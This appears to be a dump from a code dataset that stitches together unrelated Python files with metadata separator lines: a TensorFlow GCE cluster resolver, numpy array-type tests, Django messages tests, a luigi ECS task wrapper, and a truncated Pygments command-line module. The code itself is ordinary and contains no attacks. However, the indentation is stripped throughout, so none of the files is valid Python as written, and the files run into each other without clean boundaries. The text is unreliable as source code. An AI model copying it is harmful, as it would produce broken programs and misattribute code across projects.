# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of Cluster Resolvers for GCE Instance Groups."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cluster_resolver.python.training.cluster_resolver import ClusterResolver
from tensorflow.python.training.server_lib import ClusterSpec
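# googleapiclient and oauth2client are optional dependencies; record their
# availability so an ImportError is only raised when the resolver is actually
# constructed without them.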
_GOOGLE_API_CLIENT_INSTALLED = True
try:
from googleapiclient import discovery # pylint: disable=g-import-not-at-top
from oauth2client.client import GoogleCredentials # pylint: disable=g-import-not-at-top
except ImportError:
_GOOGLE_API_CLIENT_INSTALLED = False
class GceClusterResolver(ClusterResolver):
"""Cluster Resolver for Google Compute Engine.
This is an implementation of cluster resolvers for the Google Compute Engine
instance group platform. By specifying a project, zone, and instance group,
this will retrieve the IP address of all the instances within the instance
group and return a Cluster Resolver object suitable for use for distributed
TensorFlow.
"""
def __init__(self,
project,
zone,
instance_group,
port,
job_name='worker',
credentials='default',
service=None):
"""Creates a new GceClusterResolver object.
This takes in a few parameters and creates a GceClusterResolver object. It
will then use these parameters to query the GCE API for the IP addresses of
each instance in the instance group.
Args:
project: Name of the GCE project
zone: Zone of the GCE instance group
instance_group: Name of the GCE instance group
port: Port of the listening TensorFlow server (default: 8470)
job_name: Name of the TensorFlow job this set of instances belongs to
credentials: GCE Credentials. If nothing is specified, this defaults to
GoogleCredentials.get_application_default()
service: The GCE API object returned by the googleapiclient.discovery
function. (Default: discovery.build('compute', 'v1')). If you specify a
custom service object, then the credentials parameter will be ignored.
Raises:
ImportError: If the googleapiclient is not installed.
"""
self._project = project
self._zone = zone
self._instance_group = instance_group
self._job_name = job_name
self._port = port
self._credentials = credentials
if credentials == 'default':
if _GOOGLE_API_CLIENT_INSTALLED:
self._credentials = GoogleCredentials.get_application_default()
if service is None:
if not _GOOGLE_API_CLIENT_INSTALLED:
raise ImportError('googleapiclient must be installed before using the '
'GCE cluster resolver')
self._service = discovery.build(
'compute', 'v1',
credentials=self._credentials)
else:
self._service = service
def cluster_spec(self):
"""Returns a ClusterSpec object based on the latest instance group info.
This returns a ClusterSpec object for use based on information from the
specified instance group. We will retrieve the information from the GCE APIs
every time this method is called.
Returns:
A ClusterSpec containing host information retrieved from GCE.
"""
request_body = {'instanceState': 'RUNNING'}
request = self._service.instanceGroups().listInstances(
project=self._project,
zone=self._zone,
instanceGroups=self._instance_group,
body=request_body,
orderBy='name')
worker_list = []
while request is not None:
response = request.execute()
items = response['items']
for instance in items:
instance_name = instance['instance'].split('/')[-1]
instance_request = self._service.instances().get(
project=self._project,
zone=self._zone,
instance=instance_name)
if instance_request is not None:
instance_details = instance_request.execute()
ip_address = instance_details['networkInterfaces'][0]['networkIP']
instance_url = '%s:%s' % (ip_address, self._port)
worker_list.append(instance_url)
request = self._service.instanceGroups().listInstances_next(
previous_request=request,
previous_response=response)
worker_list.sort()
return ClusterSpec({self._job_name: worker_list})
def master(self):
return ''
| apache-2.0 | -4,945,389,010,880,792,000 | 36.057554 | 96 | 0.678703 | false |
tcheehow/MissionPlanner | Lib/site-packages/numpy/core/tests/test_npy_arraytypes.py | 54 | 5864 | import sys
import warnings
import numpy as np
from numpy.testing import *
warnings.filterwarnings('ignore',
'Casting complex values to real discards the imaginary part')
types = [np.bool_, np.byte, np.ubyte, np.short, np.ushort, np.intc, np.uintc,
np.int_, np.uint, np.longlong, np.ulonglong,
np.single, np.double, np.longdouble, np.csingle,
np.cdouble, np.clongdouble]
alltypes = list( types )
alltypes.append( np.datetime64 )
alltypes.append( np.timedelta64 )
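# Exercise core ndarray operations (argmax, nonzero, byteswap, clip, casting,
# take, putmask, fill) across every scalar type, including datetime64/timedelta64.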
class TestArrayTypes(TestCase):
def test_argmax( self ):
x = np.array( [False, False, True, False], dtype=np.bool )
assert x.argmax() == 2, "Broken array.argmax on np.bool"
a = np.array( [u'aaa', u'aa', u'bbb'] )
# u'aaa' > u'aa' and u'bbb' > u'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on unicode data."
a = np.array( [ 'aaa', 'aa', 'bbb'] )
# 'aaa' > 'aa' and 'bbb' > 'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on string data."
def test_argmax_numeric( self ):
# Skip the np.bool_ type as it lacks a fill function, hence can't use
# arange().
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
assert a.argmax() == 4, "Broken array.argmax on type: " + str(t)
def test_nonzero_numeric_types( self ):
for k,t in enumerate(alltypes):
a = np.array( [ t(1) ] )
assert a, "Broken array.nonzero on type: " + t
def test_nonzero_string_types( self ):
a = np.array( [ 'aaa' ] )
assert a, "Broken array.nonzero on string elements."
a = np.array( [ u'aaa' ] )
assert a, "Broken array.nonzero on Unicode elements."
def test_compare( self ):
# Light bulb! argmax doesn't call compare() for numeric/logical
# types. It only does that for string types. Duh.
pass
def test_copyswap( self ):
# Skip np.bool_.
for k,t in enumerate( types[1:] ):
x = np.arange( 10, dtype=t )
# This should exercise <type>_copyswap
x[::2].fill( t(2) )
assert_equal( x, [2,1,2,3,2,5,2,7,2,9] )
def test_copyswap_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
x[::2].fill( u'd' )
assert_equal( x, [u'd', u'b', u'd'] )
def test_copyswapn( self ):
# bool lacks arange support.
for k,t in enumerate( alltypes[1:] ):
x = np.arange( 10, dtype=t )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_copyswapn_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_compare( self ):
for k,t in enumerate( alltypes[1:] ):
try:
a = np.arange( 10, dtype=t )
keys = a[::2]
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, b.astype( t ) )
c.sort()
assert_equal( c, a )
except TypeError, e:
print "Trouble with type %d:" % k, e
def test_compare_bool( self ):
# bool can't handle numpy.arange(), so has to be coded separately.
a = np.array( [False, True], dtype=np.bool_ )
keys = a
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, keys )
c.sort()
assert_equal( c, a )
def test_dot( self ):
# Do something to test dot on bool...
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 3, dtype=t ) + 1
assert a.dot(a) == t(14), \
"Problem with dot product with array of type %s" % k
def test_clip( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
b = a.clip( 2, 3 )
x = np.array( [2,2,2,3,3], dtype=t )
assert_equal( b, x )
def test_clip_bool( self ):
a = np.array( [False, True], np.bool )
assert_equal( a.clip(False,False), [False, False] )
def test_array_casting( self ):
for k,t in enumerate( alltypes ):
a = np.array( [ t(1) ] )
for k2, t2 in enumerate( alltypes ):
b = a.astype( t2 )
if k2 < len(types):
assert b[0] == 1, \
"Busted array type casting: k=%d k2=%d" % (k,k2)
else:
# Casting to datetime64 yields a 1/1/1970+... result,
# which isn't so hot for checking against "1". So, in
# these cases, just cast back to the starting time, and
# make sure we got back what we started with.
c = b.astype( t )
assert_equal( c, a )
def test_take( self ):
# Test all types, but skip np.bool_ for now, as it lacks a fill
# function. Grrr.
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 10, dtype=t )
idx = np.arange(5) * 2
c = np.take( a, idx )
assert_equal( c, a[::2] )
def test_putmask( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
mask = np.zeros( 5, dtype=np.bool )
mask[::2] = True
np.putmask( a, mask, t(8) )
x = np.array( [8,1,8,3,8], dtype=t )
assert_equal( a, x )
def test_fillwithscalar( self ):
a = np.empty( 2, dtype=np.datetime64 )
a.fill( np.datetime64( 3 ) )
x = np.zeros( 2, dtype=np.datetime64 ) + 3
assert_equal( a, x )
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 | -904,031,484,609,910,100 | 28.467337 | 77 | 0.496419 | false |
vitan/hue | desktop/core/ext-py/Django-1.6.10/django/contrib/messages/tests/base.py | 104 | 14243 | from django import http
from django.conf import settings, global_settings
from django.contrib.messages import constants, utils, get_level, set_level
from django.contrib.messages.api import MessageFailure
from django.contrib.messages.storage import default_storage, base
from django.contrib.messages.storage.base import Message
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.utils.translation import ugettext_lazy
from django.utils.unittest import skipIf
def skipUnlessAuthIsInstalled(func):
return skipIf(
'django.contrib.auth' not in settings.INSTALLED_APPS,
"django.contrib.auth isn't installed")(func)
def add_level_messages(storage):
"""
Adds 6 messages from different levels (including a custom one) to a storage
instance.
"""
storage.add(constants.INFO, 'A generic info message')
storage.add(29, 'Some custom level')
storage.add(constants.DEBUG, 'A debugging message', extra_tags='extra-tag')
storage.add(constants.WARNING, 'A warning')
storage.add(constants.ERROR, 'An error')
storage.add(constants.SUCCESS, 'This was a triumph.')
class override_settings_tags(override_settings):
def enable(self):
super(override_settings_tags, self).enable()
# LEVEL_TAGS is a constant defined in the
# django.contrib.messages.storage.base module, so after changing
# settings.MESSAGE_TAGS, we need to update that constant too.
self.old_level_tags = base.LEVEL_TAGS
base.LEVEL_TAGS = utils.get_level_tags()
def disable(self):
super(override_settings_tags, self).disable()
base.LEVEL_TAGS = self.old_level_tags
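# Shared test mixin: concrete storage backends set storage_class and implement stored_messages_count() and test_get().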
class BaseTests(object):
storage_class = default_storage
urls = 'django.contrib.messages.tests.urls'
levels = {
'debug': constants.DEBUG,
'info': constants.INFO,
'success': constants.SUCCESS,
'warning': constants.WARNING,
'error': constants.ERROR,
}
def setUp(self):
self.settings_override = override_settings_tags(
TEMPLATE_DIRS = (),
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS,
MESSAGE_TAGS = '',
MESSAGE_STORAGE = '%s.%s' % (self.storage_class.__module__,
self.storage_class.__name__),
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer',
)
self.settings_override.enable()
def tearDown(self):
self.settings_override.disable()
def get_request(self):
return http.HttpRequest()
def get_response(self):
return http.HttpResponse()
def get_storage(self, data=None):
"""
Returns the storage backend, setting its loaded data to the ``data``
argument.
This prevents the storage ``_get`` method from being called so
that other parts of the storage backend can be tested independent of
the message retrieval logic.
"""
storage = self.storage_class(self.get_request())
storage._loaded_data = data or []
return storage
def test_add(self):
storage = self.get_storage()
self.assertFalse(storage.added_new)
storage.add(constants.INFO, 'Test message 1')
self.assertTrue(storage.added_new)
storage.add(constants.INFO, 'Test message 2', extra_tags='tag')
self.assertEqual(len(storage), 2)
def test_add_lazy_translation(self):
storage = self.get_storage()
response = self.get_response()
storage.add(constants.INFO, ugettext_lazy('lazy message'))
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 1)
def test_no_update(self):
storage = self.get_storage()
response = self.get_response()
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 0)
def test_add_update(self):
storage = self.get_storage()
response = self.get_response()
storage.add(constants.INFO, 'Test message 1')
storage.add(constants.INFO, 'Test message 1', extra_tags='tag')
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 2)
def test_existing_add_read_update(self):
storage = self.get_existing_storage()
response = self.get_response()
storage.add(constants.INFO, 'Test message 3')
list(storage) # Simulates a read
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 0)
def test_existing_read_add_update(self):
storage = self.get_existing_storage()
response = self.get_response()
list(storage) # Simulates a read
storage.add(constants.INFO, 'Test message 3')
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 1)
@override_settings(MESSAGE_LEVEL=constants.DEBUG)
def test_full_request_response_cycle(self):
"""
With the message middleware enabled, tests that messages are properly
stored and then retrieved across the full request/redirect/response
cycle.
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show')
for level in ('debug', 'info', 'success', 'warning', 'error'):
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
response = self.client.post(add_url, data, follow=True)
self.assertRedirects(response, show_url)
self.assertTrue('messages' in response.context)
messages = [Message(self.levels[level], msg) for msg in
data['messages']]
self.assertEqual(list(response.context['messages']), messages)
for msg in data['messages']:
self.assertContains(response, msg)
@override_settings(MESSAGE_LEVEL=constants.DEBUG)
def test_with_template_response(self):
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show_template_response')
for level in self.levels.keys():
add_url = reverse('django.contrib.messages.tests.urls.add_template_response',
args=(level,))
response = self.client.post(add_url, data, follow=True)
self.assertRedirects(response, show_url)
self.assertTrue('messages' in response.context)
for msg in data['messages']:
self.assertContains(response, msg)
# there shouldn't be any messages on second GET request
response = self.client.get(show_url)
for msg in data['messages']:
self.assertNotContains(response, msg)
@override_settings(MESSAGE_LEVEL=constants.DEBUG)
def test_multiple_posts(self):
"""
Tests that messages persist properly when multiple POSTs are made
before a GET.
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show')
messages = []
for level in ('debug', 'info', 'success', 'warning', 'error'):
messages.extend([Message(self.levels[level], msg) for msg in
data['messages']])
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
self.client.post(add_url, data)
response = self.client.get(show_url)
self.assertTrue('messages' in response.context)
self.assertEqual(list(response.context['messages']), messages)
for msg in data['messages']:
self.assertContains(response, msg)
@override_settings(
INSTALLED_APPS=filter(
lambda app:app!='django.contrib.messages', settings.INSTALLED_APPS),
MIDDLEWARE_CLASSES=filter(
lambda m:'MessageMiddleware' not in m, settings.MIDDLEWARE_CLASSES),
TEMPLATE_CONTEXT_PROCESSORS=filter(
lambda p:'context_processors.messages' not in p,
settings.TEMPLATE_CONTEXT_PROCESSORS),
MESSAGE_LEVEL=constants.DEBUG
)
def test_middleware_disabled(self):
"""
Tests that, when the middleware is disabled, an exception is raised
when one attempts to store a message.
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show')
for level in ('debug', 'info', 'success', 'warning', 'error'):
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
self.assertRaises(MessageFailure, self.client.post, add_url,
data, follow=True)
@override_settings(
INSTALLED_APPS=filter(
lambda app:app!='django.contrib.messages', settings.INSTALLED_APPS),
MIDDLEWARE_CLASSES=filter(
lambda m:'MessageMiddleware' not in m, settings.MIDDLEWARE_CLASSES),
TEMPLATE_CONTEXT_PROCESSORS=filter(
lambda p:'context_processors.messages' not in p,
settings.TEMPLATE_CONTEXT_PROCESSORS),
MESSAGE_LEVEL=constants.DEBUG
)
def test_middleware_disabled_fail_silently(self):
"""
Tests that, when the middleware is disabled, an exception is not
raised if 'fail_silently' = True
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
'fail_silently': True,
}
show_url = reverse('django.contrib.messages.tests.urls.show')
for level in ('debug', 'info', 'success', 'warning', 'error'):
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
response = self.client.post(add_url, data, follow=True)
self.assertRedirects(response, show_url)
self.assertFalse('messages' in response.context)
def stored_messages_count(self, storage, response):
"""
Returns the number of messages being stored after a
``storage.update()`` call.
"""
raise NotImplementedError('This method must be set by a subclass.')
def test_get(self):
raise NotImplementedError('This method must be set by a subclass.')
def get_existing_storage(self):
return self.get_storage([Message(constants.INFO, 'Test message 1'),
Message(constants.INFO, 'Test message 2',
extra_tags='tag')])
def test_existing_read(self):
"""
Tests that reading the existing storage doesn't cause the data to be
lost.
"""
storage = self.get_existing_storage()
self.assertFalse(storage.used)
# After iterating the storage engine directly, the used flag is set.
data = list(storage)
self.assertTrue(storage.used)
# The data does not disappear because it has been iterated.
self.assertEqual(data, list(storage))
def test_existing_add(self):
storage = self.get_existing_storage()
self.assertFalse(storage.added_new)
storage.add(constants.INFO, 'Test message 3')
self.assertTrue(storage.added_new)
def test_default_level(self):
# get_level works even with no storage on the request.
request = self.get_request()
self.assertEqual(get_level(request), constants.INFO)
# get_level returns the default level if it hasn't been set.
storage = self.get_storage()
request._messages = storage
self.assertEqual(get_level(request), constants.INFO)
# Only messages of sufficient level get recorded.
add_level_messages(storage)
self.assertEqual(len(storage), 5)
def test_low_level(self):
request = self.get_request()
storage = self.storage_class(request)
request._messages = storage
self.assertTrue(set_level(request, 5))
self.assertEqual(get_level(request), 5)
add_level_messages(storage)
self.assertEqual(len(storage), 6)
def test_high_level(self):
request = self.get_request()
storage = self.storage_class(request)
request._messages = storage
self.assertTrue(set_level(request, 30))
self.assertEqual(get_level(request), 30)
add_level_messages(storage)
self.assertEqual(len(storage), 2)
@override_settings(MESSAGE_LEVEL=29)
def test_settings_level(self):
request = self.get_request()
storage = self.storage_class(request)
self.assertEqual(get_level(request), 29)
add_level_messages(storage)
self.assertEqual(len(storage), 3)
def test_tags(self):
storage = self.get_storage()
storage.level = 0
add_level_messages(storage)
tags = [msg.tags for msg in storage]
self.assertEqual(tags,
['info', '', 'extra-tag debug', 'warning', 'error',
'success'])
@override_settings_tags(MESSAGE_TAGS={
constants.INFO: 'info',
constants.DEBUG: '',
constants.WARNING: '',
constants.ERROR: 'bad',
29: 'custom',
}
)
def test_custom_tags(self):
storage = self.get_storage()
storage.level = 0
add_level_messages(storage)
tags = [msg.tags for msg in storage]
self.assertEqual(tags,
['info', 'custom', 'extra-tag', '', 'bad', 'success'])
| apache-2.0 | -7,543,876,509,021,500,000 | 37.703804 | 89 | 0.609633 | false |
ContextLogic/luigi | luigi/contrib/ecs.py | 17 | 6185 | # -*- coding: utf-8 -*-
#
# Copyright 2015 Outlier Bio, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
EC2 Container Service wrapper for Luigi
From the AWS website:
Amazon EC2 Container Service (ECS) is a highly scalable, high performance
container management service that supports Docker containers and allows you
to easily run applications on a managed cluster of Amazon EC2 instances.
To use ECS, you create a taskDefinition_ JSON that defines the `docker run`_
command for one or more containers in a task or service, and then submit this
JSON to the API to run the task.
This `boto3-powered`_ wrapper allows you to create Luigi Tasks to submit ECS
``taskDefinition`` s. You can either pass a dict (mapping directly to the
``taskDefinition`` JSON) OR an Amazon Resource Name (arn) for a previously
registered ``taskDefinition``.
Requires:
- boto3 package
- Amazon AWS credentials discoverable by boto3 (e.g., by using ``aws configure``
from awscli_)
- A running ECS cluster (see `ECS Get Started`_)
Written and maintained by Jake Feala (@jfeala) for Outlier Bio (@outlierbio)
.. _`docker run`: https://docs.docker.com/reference/commandline/run
.. _taskDefinition: http://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_defintions.html
.. _`boto3-powered`: https://boto3.readthedocs.io
.. _awscli: https://aws.amazon.com/cli
.. _`ECS Get Started`: http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_GetStarted.html
"""
import time
import logging
import luigi
logger = logging.getLogger('luigi-interface')
try:
import boto3
client = boto3.client('ecs')
except ImportError:
logger.warning('boto3 is not installed. ECSTasks require boto3')
POLL_TIME = 2
def _get_task_statuses(task_ids):
"""
Retrieve task statuses from ECS API
Returns list of {RUNNING|PENDING|STOPPED} for each id in task_ids
"""
response = client.describe_tasks(tasks=task_ids)
# Error checking
if response['failures'] != []:
raise Exception('There were some failures:\n{0}'.format(
response['failures']))
status_code = response['ResponseMetadata']['HTTPStatusCode']
if status_code != 200:
msg = 'Task status request received status code {0}:\n{1}'
raise Exception(msg.format(status_code, response))
return [t['lastStatus'] for t in response['tasks']]
def _track_tasks(task_ids):
"""Poll task status until STOPPED"""
while True:
statuses = _get_task_statuses(task_ids)
if all([status == 'STOPPED' for status in statuses]):
logger.info('ECS tasks {0} STOPPED'.format(','.join(task_ids)))
break
time.sleep(POLL_TIME)
        logger.debug('ECS task status for tasks {0}: {1}'.format(
            ','.join(task_ids), statuses))
class ECSTask(luigi.Task):
"""
Base class for an Amazon EC2 Container Service Task
Amazon ECS requires you to register "tasks", which are JSON descriptions
for how to issue the ``docker run`` command. This Luigi Task can either
run a pre-registered ECS taskDefinition, OR register the task on the fly
from a Python dict.
:param task_def_arn: pre-registered task definition ARN (Amazon Resource
Name), of the form::
arn:aws:ecs:<region>:<user_id>:task-definition/<family>:<tag>
:param task_def: dict describing task in taskDefinition JSON format, for
example::
task_def = {
'family': 'hello-world',
'volumes': [],
'containerDefinitions': [
{
'memory': 1,
'essential': True,
'name': 'hello-world',
'image': 'ubuntu',
'command': ['/bin/echo', 'hello world']
}
]
}
"""
task_def_arn = luigi.Parameter(default=None)
task_def = luigi.Parameter(default=None)
@property
def ecs_task_ids(self):
"""Expose the ECS task ID"""
if hasattr(self, '_task_ids'):
return self._task_ids
@property
def command(self):
"""
Command passed to the containers
Override to return list of dicts with keys 'name' and 'command',
describing the container names and commands to pass to the container.
Directly corresponds to the `overrides` parameter of runTask API. For
example::
[
{
'name': 'myContainer',
'command': ['/bin/sleep', '60']
}
]
"""
pass
def run(self):
if (not self.task_def and not self.task_def_arn) or \
(self.task_def and self.task_def_arn):
            raise ValueError(('Either (but not both) a task_def (dict) or '
                              'task_def_arn (string) must be assigned'))
if not self.task_def_arn:
# Register the task and get assigned taskDefinition ID (arn)
response = client.register_task_definition(**self.task_def)
self.task_def_arn = response['taskDefinition']['taskDefinitionArn']
# Submit the task to AWS ECS and get assigned task ID
# (list containing 1 string)
if self.command:
overrides = {'containerOverrides': self.command}
else:
overrides = {}
response = client.run_task(taskDefinition=self.task_def_arn,
overrides=overrides)
self._task_ids = [task['taskArn'] for task in response['tasks']]
# Wait on task completion
_track_tasks(self._task_ids)
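# --- Usage sketch (not part of the original module) ---
# A minimal, hypothetical example of wiring ECSTask to a pre-registered task
# definition. The ARN below is a made-up placeholder; swap in a real
# ``register_task_definition`` result, or set ``task_def`` to a dict instead.
# Run with e.g.: ``luigi --module <your module> ExampleHelloWorldTask --local-scheduler``
class ExampleHelloWorldTask(ECSTask):
    task_def_arn = luigi.Parameter(
        default='arn:aws:ecs:us-east-1:123456789012:task-definition/hello-world:1')
    @property
    def command(self):
        # Optionally override the container command at run time.
        return [{'name': 'hello-world', 'command': ['/bin/echo', 'hello world']}]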
| apache-2.0 | -8,793,460,644,669,075,000 | 32.61413 | 101 | 0.627648 | false |
amghost/myblog | node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/cmdline.py | 95 | 13621 | # -*- coding: utf-8 -*-
"""
pygments.cmdline
~~~~~~~~~~~~~~~~
Command line interface.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
import getopt
from textwrap import dedent
from pygments import __version__, highlight
from pygments.util import ClassNotFound, OptionError, docstring_headline
from pygments.lexers import get_all_lexers, get_lexer_by_name, get_lexer_for_filename, \
find_lexer_class, guess_lexer, TextLexer
from pygments.formatters import get_all_formatters, get_formatter_by_name, \
get_formatter_for_filename, find_formatter_class, \
TerminalFormatter # pylint:disable-msg=E0611
from pygments.filters import get_all_filters, find_filter_class
from pygments.styles import get_all_styles, get_style_by_name
USAGE = """\
Usage: %s [-l <lexer> | -g] [-F <filter>[:<options>]] [-f <formatter>]
[-O <options>] [-P <option=value>] [-o <outfile>] [<infile>]
%s -S <style> -f <formatter> [-a <arg>] [-O <options>] [-P <option=value>]
%s -L [<which> ...]
%s -N <filename>
%s -H <type> <name>
%s -h | -V
Highlight the input file and write the result to <outfile>.
If no input file is given, use stdin, if -o is not given, use stdout.
<lexer> is a lexer name (query all lexer names with -L). If -l is not
given, the lexer is guessed from the extension of the input file name
(this obviously doesn't work if the input is stdin). If -g is passed,
attempt to guess the lexer from the file contents, or pass through as
plain text if this fails (this can work for stdin).
Likewise, <formatter> is a formatter name, and will be guessed from
the extension of the output file name. If no output file is given,
the terminal formatter will be used by default.
With the -O option, you can give the lexer and formatter a comma-
separated list of options, e.g. ``-O bg=light,python=cool``.
The -P option adds lexer and formatter options like the -O option, but
you can only give one option per -P. That way, the option value may
contain commas and equals signs, which it can't with -O, e.g.
``-P "heading=Pygments, the Python highlighter".
With the -F option, you can add filters to the token stream, you can
give options in the same way as for -O after a colon (note: there must
not be spaces around the colon).
The -O, -P and -F options can be given multiple times.
With the -S option, print out style definitions for style <style>
for formatter <formatter>. The argument given by -a is formatter
dependent.
The -L option lists lexers, formatters, styles or filters -- set
`which` to the thing you want to list (e.g. "styles"), or omit it to
list everything.
The -N option guesses and prints out a lexer name based solely on
the given filename. It does not take input or highlight anything.
If no specific lexer can be determined "text" is returned.
The -H option prints detailed help for the object <name> of type <type>,
where <type> is one of "lexer", "formatter" or "filter".
The -h option prints this help.
The -V option prints the package version.
"""
def _parse_options(o_strs):
opts = {}
if not o_strs:
return opts
for o_str in o_strs:
if not o_str:
continue
o_args = o_str.split(',')
for o_arg in o_args:
o_arg = o_arg.strip()
try:
o_key, o_val = o_arg.split('=')
o_key = o_key.strip()
o_val = o_val.strip()
except ValueError:
opts[o_arg] = True
else:
opts[o_key] = o_val
return opts
def _parse_filters(f_strs):
filters = []
if not f_strs:
return filters
for f_str in f_strs:
if ':' in f_str:
fname, fopts = f_str.split(':', 1)
filters.append((fname, _parse_options([fopts])))
else:
filters.append((f_str, {}))
return filters
def _print_help(what, name):
try:
if what == 'lexer':
cls = find_lexer_class(name)
print("Help on the %s lexer:" % cls.name)
print(dedent(cls.__doc__))
elif what == 'formatter':
cls = find_formatter_class(name)
print("Help on the %s formatter:" % cls.name)
print(dedent(cls.__doc__))
elif what == 'filter':
cls = find_filter_class(name)
print("Help on the %s filter:" % name)
print(dedent(cls.__doc__))
except AttributeError:
print("%s not found!" % what, file=sys.stderr)
def _print_list(what):
if what == 'lexer':
print()
print("Lexers:")
print("~~~~~~~")
info = []
for fullname, names, exts, _ in get_all_lexers():
tup = (', '.join(names)+':', fullname,
exts and '(filenames ' + ', '.join(exts) + ')' or '')
info.append(tup)
info.sort()
for i in info:
print(('* %s\n %s %s') % i)
elif what == 'formatter':
print()
print("Formatters:")
print("~~~~~~~~~~~")
info = []
for cls in get_all_formatters():
doc = docstring_headline(cls)
tup = (', '.join(cls.aliases) + ':', doc, cls.filenames and
'(filenames ' + ', '.join(cls.filenames) + ')' or '')
info.append(tup)
info.sort()
for i in info:
print(('* %s\n %s %s') % i)
elif what == 'filter':
print()
print("Filters:")
print("~~~~~~~~")
for name in get_all_filters():
cls = find_filter_class(name)
print("* " + name + ':')
print(" %s" % docstring_headline(cls))
elif what == 'style':
print()
print("Styles:")
print("~~~~~~~")
for name in get_all_styles():
cls = get_style_by_name(name)
print("* " + name + ':')
print(" %s" % docstring_headline(cls))
def main(args=sys.argv):
"""
Main command line entry point.
"""
# pylint: disable-msg=R0911,R0912,R0915
usage = USAGE % ((args[0],) * 6)
if sys.platform in ['win32', 'cygwin']:
try:
# Provide coloring under Windows, if possible
import colorama
colorama.init()
except ImportError:
pass
try:
popts, args = getopt.getopt(args[1:], "l:f:F:o:O:P:LS:a:N:hVHg")
except getopt.GetoptError as err:
print(usage, file=sys.stderr)
return 2
opts = {}
O_opts = []
P_opts = []
F_opts = []
for opt, arg in popts:
if opt == '-O':
O_opts.append(arg)
elif opt == '-P':
P_opts.append(arg)
elif opt == '-F':
F_opts.append(arg)
opts[opt] = arg
if not opts and not args:
print(usage)
return 0
if opts.pop('-h', None) is not None:
print(usage)
return 0
if opts.pop('-V', None) is not None:
print('Pygments version %s, (c) 2006-2013 by Georg Brandl.' % __version__)
return 0
# handle ``pygmentize -L``
L_opt = opts.pop('-L', None)
if L_opt is not None:
if opts:
print(usage, file=sys.stderr)
return 2
# print version
main(['', '-V'])
if not args:
args = ['lexer', 'formatter', 'filter', 'style']
for arg in args:
_print_list(arg.rstrip('s'))
return 0
# handle ``pygmentize -H``
H_opt = opts.pop('-H', None)
if H_opt is not None:
if opts or len(args) != 2:
print(usage, file=sys.stderr)
return 2
what, name = args
if what not in ('lexer', 'formatter', 'filter'):
print(usage, file=sys.stderr)
return 2
_print_help(what, name)
return 0
# parse -O options
parsed_opts = _parse_options(O_opts)
opts.pop('-O', None)
# parse -P options
for p_opt in P_opts:
try:
name, value = p_opt.split('=', 1)
except ValueError:
parsed_opts[p_opt] = True
else:
parsed_opts[name] = value
opts.pop('-P', None)
# handle ``pygmentize -N``
infn = opts.pop('-N', None)
if infn is not None:
try:
lexer = get_lexer_for_filename(infn, **parsed_opts)
except ClassNotFound as err:
lexer = TextLexer()
except OptionError as err:
print('Error:', err, file=sys.stderr)
return 1
print(lexer.aliases[0])
return 0
# handle ``pygmentize -S``
S_opt = opts.pop('-S', None)
a_opt = opts.pop('-a', None)
if S_opt is not None:
f_opt = opts.pop('-f', None)
if not f_opt:
print(usage, file=sys.stderr)
return 2
if opts or args:
print(usage, file=sys.stderr)
return 2
try:
parsed_opts['style'] = S_opt
fmter = get_formatter_by_name(f_opt, **parsed_opts)
except ClassNotFound as err:
print(err, file=sys.stderr)
return 1
arg = a_opt or ''
try:
print(fmter.get_style_defs(arg))
except Exception as err:
print('Error:', err, file=sys.stderr)
return 1
return 0
# if no -S is given, -a is not allowed
if a_opt is not None:
print(usage, file=sys.stderr)
return 2
# parse -F options
